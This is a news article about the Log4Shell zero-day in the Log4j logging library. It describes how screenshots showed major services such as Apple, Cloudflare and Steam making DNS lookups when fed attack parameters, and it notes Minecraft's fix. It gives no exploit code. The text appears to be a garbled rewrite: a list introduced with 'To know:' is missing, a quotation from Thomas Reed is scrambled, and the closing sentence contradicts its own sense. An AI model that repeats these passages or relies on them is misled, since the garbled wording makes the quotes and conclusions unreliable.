The list of services with internet-facing infrastructure vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter and Baidu.
The vulnerability, now called Log4Shell, came to light on Thursday afternoon, when several Minecraft services and news sites warned of actively circulating attack code that exploited the vulnerability to run malicious code on servers and clients running the world’s best-selling game. It soon became clear that Minecraft was just one of probably thousands of big names to be felled by similar attacks.
A compilation of screenshots posted online documents how some of the world’s most popular and trusted cloud-based services react when given parameters used in the attack. To know:
The images use a domain name leak detection service called dnslog.cn to see if the target cloud service performs a DNS lookup. Each image shows that the service is accepting connections from an attacker-controlled machine (as evidenced by the IP connection log).
“Normally, typing something in a username should never establish remote network connections, so the fact that it does prove that Log4j is used here and therefore the server could be vulnerable to a remote code execution attack”, Ars reader skizzerz explained in the comments below.
While the images show that the services respond to user input in unintended and potentially dangerous ways, the services are not automatically vulnerable to the types of code execution attacks that have been compromised Minecraft servers. That’s because these services typically have multiple layers of defense. If a layer fails, additional layers are often available to reduce or completely eliminate real damage.
On the other hand, the images show that unauthorized persons can abuse Log4Shell to access the servers of some of the world’s most powerful companies in ways they never intended. When asked about access to Apple servers, Malwarebytes director of Mac offerings Thomas Reed said, “This is much worse than if individual devices were vulnerable, and I think at this point it’s an open question what kind of data attackers are likely to be.” from Apple’s services as we speak.” Apple representatives did not respond to an email asking for comment.
Cloudflare, meanwhile, said in a message that it has taken steps to block attacks on its network and against its customers. Cloudflare Chief Security Officer Joe Sullivan said his team has been unable to reproduce the behavior depicted in the image and does not recognize the IP addresses shown.
Minecraft rolled out a fix on Friday.
The upside is that it is now too early to say that these services are not vulnerable. For now, people should remain wary and wait for advice from the affected providers.
List image by Jeffrey Coolidge / Getty Images